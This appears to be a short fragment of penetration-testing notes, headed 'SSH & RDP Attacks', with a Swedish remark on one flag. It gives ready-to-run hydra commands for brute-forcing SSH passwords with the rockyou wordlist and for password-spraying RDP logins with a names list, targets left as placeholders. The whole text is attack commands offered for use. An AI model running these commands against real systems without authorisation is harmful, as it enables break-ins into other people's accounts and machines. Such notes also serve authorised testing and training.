1. SSH & RDP Attacks
SSH Password Brute Force:
sudo hydra -l <username> -P /usr/share/wordlists/rockyou/rockyou.txt -s <port> ssh://<ip>
RDP Password Spray:
sudo hydra -L /usr/share/wordlists/dirb/others/names.txt -p "<password>" rdp://<ip>
-f = stoppar efter första hittade inloggningen